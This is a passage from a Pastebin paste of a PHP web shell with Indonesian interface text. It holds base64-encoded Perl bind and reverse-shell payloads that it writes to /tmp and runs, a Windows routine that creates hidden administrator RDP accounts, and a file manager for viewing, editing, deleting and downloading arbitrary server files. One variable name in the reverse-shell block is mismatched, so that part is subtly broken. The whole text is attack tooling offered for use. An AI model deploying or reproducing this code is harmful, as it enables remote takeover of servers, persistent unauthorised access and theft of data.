  2757.     </form>
  2758.     <form method='post'>
  2759.     <u>Back Connect:</u> <br>
  2760.     Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>&nbsp;&nbsp;
  2761.     PORT: <input type='text' placeholder='port' name='port_bc' value='6969'>
  2762.     <input type='submit' name='sub_bc' value='>>'>
  2763.     </form>";
  2764.     $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
  2765.     if(isset($_POST['sub_bp'])) {
  2766.         $f_bp = fopen("/tmp/bp.pl", "w");
  2767.         fwrite($f_bp, base64_decode($bind_port_p));
  2768.         fclose($f_bp);
  2769.  
  2770.         $port = $_POST['port_bind'];
  2771.         $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
  2772.         sleep(1);
  2773.         echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>";
  2774.         unlink("/tmp/bp.pl");
  2775.     }
  2776.     $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
  2777.     if(isset($_POST['sub_bc'])) {
  2778.         $f_bc = fopen("/tmp/bc.pl", "w");
  2779.         fwrite($f_bc, base64_decode($bind_connect_p));
  2780.         fclose($f_bc);
  2781.  
  2782.         $ipbc = $_POST['ip_bc'];
  2783.         $port = $_POST['port_bc'];
  2784.         $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
  2785.         sleep(1);
  2786.         echo "<pre>".$out."\n".exe("ps aux | grep bc.pl")."</pre>";
  2787.         unlink("/tmp/bc.pl");
  2788.     }
  2789. } elseif($_GET['do'] == 'krdp_shell') {
  2790.     if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
  2791.         if($_POST['create']) {
  2792.             $user = htmlspecialchars($_POST['user']);
  2793.             $pass = htmlspecialchars($_POST['pass']);
  2794.             if(preg_match("/$user/", exe("net user"))) {
  2795.                 echo "[INFO] -> <font color=red>user <font color=lime>$user</font> sudah ada</font>";
  2796.             } else {
  2797.                 $add_user   = exe("net user $user $pass /add");
  2798.                 $add_groups1 = exe("net localgroup Administrators $user /add");
  2799.                 $add_groups2 = exe("net localgroup Administrator $user /add");
  2800.                 $add_groups3 = exe("net localgroup Administrateur $user /add");
  2801.                 echo "[ RDP ACCOUNT INFO ]<br>
  2802.                 ------------------------------<br>
  2803.                 IP: <font color=lime>".$ip."</font><br>
  2804.                 Username: <font color=lime>$user</font><br>
  2805.                 Password: <font color=lime>$pass</font><br>
  2806.                 ------------------------------<br><br>
  2807.                 [ STATUS ]<br>
  2808.                 ------------------------------<br>
  2809.                 ";
  2810.                 if($add_user) {
  2811.                     echo "[add user] -> <font color='lime'>Berhasil</font><br>";
  2812.                 } else {
  2813.                     echo "[add user] -> <font color='red'>Gagal</font><br>";
  2814.                 }
  2815.                 if($add_groups1) {
  2816.                     echo "[add localgroup Administrators] -> <font color='lime'>Berhasil</font><br>";
  2817.                 } elseif($add_groups2) {
  2818.                     echo "[add localgroup Administrator] -> <font color='lime'>Berhasil</font><br>";
  2819.                 } elseif($add_groups3) {
  2820.                     echo "[add localgroup Administrateur] -> <font color='lime'>Berhasil</font><br>";
  2821.                 } else {
  2822.                     echo "[add localgroup] -> <font color='red'>Gagal</font><br>";
  2823.                 }
  2824.                 echo "------------------------------<br>";
  2825.             }
  2826.         } elseif($_POST['s_opsi']) {
  2827.             $user = htmlspecialchars($_POST['r_user']);
  2828.             if($_POST['opsi'] == '1') {
  2829.                 $cek = exe("net user $user");
  2830.                 echo "Checking username <font color=lime>$user</font> ....... ";
  2831.                 if(preg_match("/$user/", $cek)) {
  2832.                     echo "[ <font color=lime>Sudah ada</font> ]<br>
  2833.                     ------------------------------<br><br>
  2834.                     <pre>$cek</pre>";
  2835.                 } else {
  2836.                     echo "[ <font color=red>belum ada</font> ]";
  2837.                 }
  2838.             } elseif($_POST['opsi'] == '2') {
  2839.                 $cek = exe("net user $user global");
  2840.                 if(preg_match("/$user/", exe("net user"))) {
  2841.                     echo "[change password: <font color=lime>global</font>] -> ";
  2842.                     if($cek) {
  2843.                         echo "<font color=lime>Berhasil</font>";
  2844.                     } else {
  2845.                         echo "<font color=red>Gagal</font>";
  2846.                     }
  2847.                 } else {
  2848.                     echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
  2849.                 }
  2850.             } elseif($_POST['opsi'] == '3') {
  2851.                 $cek = exe("net user $user /DELETE");
  2852.                 if(preg_match("/$user/", exe("net user"))) {
  2853.                     echo "[remove user: <font color=lime>$user</font>] -> ";
  2854.                     if($cek) {
  2855.                         echo "<font color=lime>Berhasil</font>";
  2856.                     } else {
  2857.                         echo "<font color=red>Gagal</font>";
  2858.                     }
  2859.                 } else {
  2860.                     echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
  2861.                 }
  2862.             } else {
  2863.                 //
  2864.             }
  2865.         } else {
  2866.             echo "-- Create RDP --<br>
  2867.             <form method='post'>
  2868.             <input type='text' name='user' placeholder='username' value='global' required>
  2869.             <input type='text' name='pass' placeholder='password' value='global' required>
  2870.             <input type='submit' name='create' value='>>'>
  2871.             </form>
  2872.             -- Option --<br>
  2873.             <form method='post'>
  2874.             <input type='text' name='r_user' placeholder='username' required>
  2875.             <select name='opsi'>
  2876.             <option value='1'>Cek Username</option>
  2877.             <option value='2'>Ubah Password</option>
  2878.             <option value='3'>Hapus Username</option>
  2879.             </select>
  2880.             <input type='submit' name='s_opsi' value='>>'>
  2881.             </form>
  2882.             ";
  2883.         }
  2884.     } else {
  2885.         echo "<font color=red>Fitur ini hanya dapat digunakan dalam Windows Server.</font>";
  2886.     }
  2887. } elseif($_GET['act'] == 'newfile') {
  2888.     if($_POST['new_save_file']) {
  2889.         $newfile = htmlspecialchars($_POST['newfile']);
  2890.         $fopen = fopen($newfile, "a+");
  2891.         if($fopen) {
  2892.             $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
  2893.         } else {
  2894.             $act = "<font color=red>permission denied</font>";
  2895.         }
  2896.     }
  2897.     echo $act;
  2898.     echo "<form method='post'>
  2899.     Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
  2900.     <input type='submit' name='new_save_file' value='Submit'>
  2901.     </form>";
  2902. } elseif($_GET['act'] == 'newfolder') {
  2903.     if($_POST['new_save_folder']) {
  2904.         $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
  2905.         if(!mkdir($new_folder)) {
  2906.             $act = "<font color=red>permission denied</font>";
  2907.         } else {
  2908.             $act = "<script>window.location='?dir=".$dir."';</script>";
  2909.         }
  2910.     }
  2911.     echo $act;
  2912.     echo "<form method='post'>
  2913.     Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
  2914.     <input type='submit' name='new_save_folder' value='Submit'>
  2915.     </form>";
  2916. } elseif($_GET['act'] == 'rename_dir') {
  2917.     if($_POST['dir_rename']) {
  2918.         $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
  2919.         if($dir_rename) {
  2920.             $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  2921.         } else {
  2922.             $act = "<font color=red>permission denied</font>";
  2923.         }
  2924.     echo "".$act."<br>";
  2925.     }
  2926.     echo "<form method='post'>
  2927.     <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
  2928.     <input type='submit' name='dir_rename' value='rename'>
  2929.     </form>";
  2930. } elseif($_GET['act'] == 'delete_dir') {
  2931.     if(is_dir($dir)) {
  2932.         if(is_writable($dir)) {
  2933.             @rmdir($dir);
  2934.             @exe("rm -rf $dir");
  2935.             @exe("rmdir /s /q $dir");
  2936.             $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  2937.         } else {
  2938.             $act = "<font color=red>could not remove ".basename($dir)."</font>";
  2939.         }
  2940.     }
  2941.     echo $act;
  2942. } elseif($_GET['act'] == 'view') {
  2943.     echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  2944.     echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
  2945. } elseif($_GET['act'] == 'edit') {
  2946.     if($_POST['save']) {
  2947.         $save = file_put_contents($_GET['file'], $_POST['src']);
  2948.         if($save) {
  2949.             $act = "<font color=lime>Saved!</font>";
  2950.         } else {
  2951.             $act = "<font color=red>permission denied</font>";
  2952.         }
  2953.     echo "".$act."<br>";
  2954.     }
  2955.     echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  2956.     echo "<form method='post'>
  2957.     <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
  2958.     <input type='submit' value='Save' name='save' style='width: 500px;'>
  2959.     </form>";
  2960. } elseif($_GET['act'] == 'rename') {
  2961.     if($_POST['do_rename']) {
  2962.         $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
  2963.         if($rename) {
  2964.             $act = "<script>window.location='?dir=".$dir."';</script>";
  2965.         } else {
  2966.             $act = "<font color=red>permission denied</font>";
  2967.         }
  2968.     echo "".$act."<br>";
  2969.     }
  2970.     echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  2971.     echo "<form method='post'>
  2972.     <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
  2973.     <input type='submit' name='do_rename' value='rename'>
  2974.     </form>";
  2975. } elseif($_GET['act'] == 'delete') {
  2976.     $delete = unlink($_GET['file']);
  2977.     if($delete) {
  2978.         $act = "<script>window.location='?dir=".$dir."';</script>";
  2979.     } else {
  2980.         $act = "<font color=red>permission denied</font>";
  2981.     }
  2982.     echo $act;
  2983. } else {
  2984.     if(is_dir($dir) === true) {
  2985.         if(!is_readable($dir)) {
  2986.             echo "<font color=red>can't open directory. ( not readable )</font>";
  2987.         } else {
  2988.             echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
  2989.             <tr>
  2990.             <th class="th_home"><center>Name</center></th>
  2991.             <th class="th_home"><center>Type</center></th>
  2992.             <th class="th_home"><center>Size</center></th>
  2993.             <th class="th_home"><center>Last Modified</center></th>
  2994.             <th class="th_home"><center>Owner/Group</center></th>
  2995.             <th class="th_home"><center>Permission</center></th>
  2996.             <th class="th_home"><center>Action</center></th>
  2997.             </tr>';
  2998.             $scandir = scandir($dir);
  2999.             foreach($scandir as $dirx) {
  3000.                 $dtype = filetype("$dir/$dirx");
  3001.                 $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
  3002.                 if(function_exists('posix_getpwuid')) {
  3003.                     $downer = @posix_getpwuid(fileowner("$dir/$dirx"));
  3004.                     $downer = $downer['name'];
  3005.                 } else {
  3006.                     //$downer = $uid;
  3007.                     $downer = fileowner("$dir/$dirx");
  3008.                 }
  3009.                 if(function_exists('posix_getgrgid')) {
  3010.                     $dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
  3011.                     $dgrp = $dgrp['name'];
  3012.                 } else {
  3013.                     $dgrp = filegroup("$dir/$dirx");
  3014.                 }
  3015.                 if(!is_dir("$dir/$dirx")) continue;
  3016.                 if($dirx === '..') {
  3017.                     $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
  3018.                 } elseif($dirx === '.') {
  3019.                     $href = "<a href='?dir=$dir'>$dirx</a>";
  3020.                 } else {
  3021.                     $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
  3022.                 }
  3023.                 if($dirx === '.' || $dirx === '..') {
  3024.                     $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
  3025.                     } else {
  3026.                     $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
  3027.                 }
  3028.                 echo "<tr>";
  3029.                 echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
  3030.                 echo "<td class='td_home'><center>$dtype</center></td>";
  3031.                 echo "<td class='td_home'><center>-</center></th></td>";
  3032.                 echo "<td class='td_home'><center>$dtime</center></td>";
  3033.                 echo "<td class='td_home'><center>$downer/$dgrp</center></td>";
  3034.                 echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
  3035.                 echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
  3036.                 echo "</tr>";
  3037.             }
  3038.         }
  3039.     } else {
  3040.         echo "<font color=red>can't open directory.</font>";
  3041.     }
  3042.         foreach($scandir as $file) {
  3043.             $ftype = filetype("$dir/$file");
  3044.             $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
  3045.             $size = filesize("$dir/$file")/1024;
  3046.             $size = round($size,3);
  3047.             if(function_exists('posix_getpwuid')) {
  3048.                 $fowner = @posix_getpwuid(fileowner("$dir/$file"));
  3049.                 $fowner = $fowner['name'];
  3050.             } else {
  3051.                 //$downer = $uid;
  3052.                 $fowner = fileowner("$dir/$file");
  3053.             }
  3054.             if(function_exists('posix_getgrgid')) {
  3055.                 $fgrp = @posix_getgrgid(filegroup("$dir/$file"));
  3056.                 $fgrp = $fgrp['name'];
  3057.             } else {
  3058.                 $fgrp = filegroup("$dir/$file");
  3059.             }
  3060.             if($size > 1024) {
  3061.                 $size = round($size/1024,2). 'MB';
  3062.             } else {
  3063.                 $size = $size. 'KB';
  3064.             }
  3065.             if(!is_file("$dir/$file")) continue;
  3066.             echo "<tr>";
  3067.             echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
  3068.             echo "<td class='td_home'><center>$ftype</center></td>";
  3069.             echo "<td class='td_home'><center>$size</center></td>";
  3070.             echo "<td class='td_home'><center>$ftime</center></td>";
  3071.             echo "<td class='td_home'><center>$fowner/$fgrp</center></td>";
  3072.             echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
  3073.             echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
  3074.             echo "</tr>";
  3075.         }
  3076.         echo "</table>";
  3077.         if(!is_readable($dir)) {
  3078.             //
  3079.         } else {
  3080.         }
  3081. }
  3082. ?>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top